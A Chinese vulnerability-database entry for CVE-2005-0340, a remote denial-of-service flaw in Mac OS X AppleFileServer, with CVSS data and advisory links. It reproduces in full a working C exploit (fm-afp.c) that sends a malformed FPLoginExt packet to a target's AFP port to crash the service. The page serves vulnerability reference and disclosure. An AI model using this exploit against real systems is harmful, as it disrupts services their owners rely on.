CVE-2005-0340
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:10:47
NMCOE    

[原文]Integer signedness error in Apple File Service (AFP Server) allows remote attackers to cause a denial of service (application crash) via a negative UAM string length in a FPLoginExt packet.


[CNNVD]Apple Mac OS X AppleFileServer 远程整数溢出漏洞(CNNVD-200505-472)

        Apple File Service (AFP Server)中存在整数符号类型错误,允许远程攻击者通过FPLoginExt数据包中负值的UAM字符串长度来引起拒绝服务(应用程序崩溃)攻击。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0340
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0340
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-472
(官方数据源) CNNVD

- 其它链接及资源

http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.html
(PATCH)  APPLE  APPLE-SA-2005-03-21
http://marc.info/?l=bugtraq&m=110791369419784&w=2
(UNKNOWN)  BUGTRAQ  20050208 AppleFileServer Denial of Service.
http://www.securityfocus.com/bid/12478
(UNKNOWN)  BID  12478
http://xforce.iss.net/xforce/xfdb/19263
(UNKNOWN)  XF  Applefileserver-fploginext-dos(19263)

- 漏洞信息

Apple Mac OS X AppleFileServer 远程整数溢出漏洞
中危 边界条件错误
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Apple File Service (AFP Server)中存在整数符号类型错误,允许远程攻击者通过FPLoginExt数据包中负值的UAM字符串长度来引起拒绝服务(应用程序崩溃)攻击。

- 公告与补丁

        暂无数据

- 漏洞信息 (799)

Mac OS X AppleFileServer Remote Denial of Service Exploit (EDBID:799)
osX dos
2005-02-08 Verified
0 nemo
N/A [点击下载]
/* [ fm-afp.c ]
* -( nemo @ felinemenace.org )- 2005
*
* Code for afp bug found by Braden Thomas.
*
* Again hello to everyone @ irc.pulltheplug.org
*
* need a challenge? -( http://pulltheplug.org )-
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define UAMSIZE    1022
#define AFPVERSIZE 5
#define PATHSIZE   30
#define UASIZE     30
#define AFPNSIZE   5
#define AFPPORT    548
#define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd)

typedef struct { char AFPVER[AFPVERSIZE]  ;} AFPVER_T;
typedef struct { char UAM[UAMSIZE]        ;} UAM_T;
typedef struct { char PATH[PATHSIZE]      ;} PATH_T;
typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t;
typedef struct { char AFPName[AFPNSIZE]   ;} AFPName_t;

typedef struct dsi { // Data Stream Interface.
       u_int8_t  req;
       u_int8_t  com;
       u_int16_t id;
       u_int32_t offset;
       u_int32_t len;
       u_int32_t reserved;
} DSI_T;

typedef struct FPLoginExt { // Establishes a session with a server using an Open Directory domain.
       u_int8_t   command;
       u_int8_t   pad;
       u_int16_t  flags;
       AFPVER_T   AFPVER;
       UAM_T      UAM;
       u_int8_t   UserNameType;
       AFPName_t  UserName;
       u_int8_t   PathType;
       PATH_T     Pathname;
       u_int8_t   pad2;
       UserAuth_t UserAuthInfo;
} FP_LoginExt_T;

DSI_T dsi;
FP_LoginExt_T fploginext;

void banner()
{
       printf(" [ fm-afp.c ]\n");
       printf("-( nemo@felinemenace.org )-\n\n");
}

void usage(char *progname)
{
       printf("usage: %s <ip address>.\n",progname);
       exit(1);
}

int connect_afp(char *ip,int *sockfd)
{
       struct sockaddr_in target_addr;
       int len;

       *sockfd = socket(AF_INET, SOCK_STREAM, 0);

       target_addr.sin_family = AF_INET;
       target_addr.sin_port = htons(AFPPORT);
       inet_aton(ip, &(target_addr.sin_addr));
       memset(&(target_addr.sin_zero), '\0', 8);

       if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) {
               return 1;
       }
       return 0;
}

void generate_packet(char *packet)
{
       int n;

       dsi.req       = '\x00';
       dsi.com       = '\x02';
       dsi.id        = (u_int16_t)0x0002;
       dsi.offset    = 0x00000000;
       dsi.len       = 0x00000434;
       dsi.reserved  = 0x00000000;

       fploginext.command = (u_int8_t)'\x3f';
       fploginext.pad     = (u_int8_t)'\x00';
       fploginext.flags   = (u_int16_t)0x0000;
       memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5);
       memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM));
       fploginext.UAM.UAM[0] = '\x0f';
       fploginext.UAM.UAM[1] = '\xff';
       fploginext.UAM.UAM[257] = '\xff';               //      size of next string.
       fploginext.UAM.UAM[258] = '\xff';               //
       fploginext.UAM.UAM[500] = '\x00';               //      size of next string.
       fploginext.UAM.UAM[501] = '\xf0';               //

       fploginext.UserNameType = (u_int8_t)'\x11';
       memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5);
       fploginext.PathType = (u_int8_t)'\xff';
       memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30);
       fploginext.pad2 = (u_int8_t)'\xff';
       memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30);

       memcpy(packet, &dsi, sizeof(dsi));
       packet += sizeof(dsi);
       memcpy(packet, &fploginext, sizeof(fploginext));
}

int send_packet(char *packet,int *sockfd)
{
       if (send(*sockfd, packet, BUFSIZE, 0) == -1) {
               return 1;
       }

       return 0;
}

int main(int ac, char **av)
{
       int sockfd;
       char packet[BUFSIZE];
       struct timeval time;

       banner();
       if(ac != 2) {
               usage(*av);
       }
       printf("[+] Connecting to target: %s.\n",av[1]);
       if(connect_afp(av[1],&sockfd)) {
               printf("[-] An error has occured connecting to the target.\n");
               exit(1);
       }

       printf("[+] Generating malicious packet.\n");
       generate_packet(packet);

       printf("[+] Sending packet to target.\n");
       if(send_packet(packet,&sockfd)) {
               printf("[-] Error sending packet.\n");
               close(sockfd);
               exit(1);
       }

       fd_set mySet;
       FD_ZERO(&mySet);
       FD_SET(sockfd, &mySet);
       time.tv_sec = 0;
       time.tv_usec = 50;
       select(sockfd+1, &mySet, NULL, NULL, &time);

       close(sockfd);
       return 0;
}

// milw0rm.com [2005-02-08]
		

- 漏洞信息

13780
Apple Mac OS X AppleFileServer Malformed FPLoginExt Packet DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Mac OS X. The AFP Server fails to validate FPLoginExt packets resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service resulting in a loss of availability.

- 时间线

2005-02-08 Unknow
2005-01-25 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站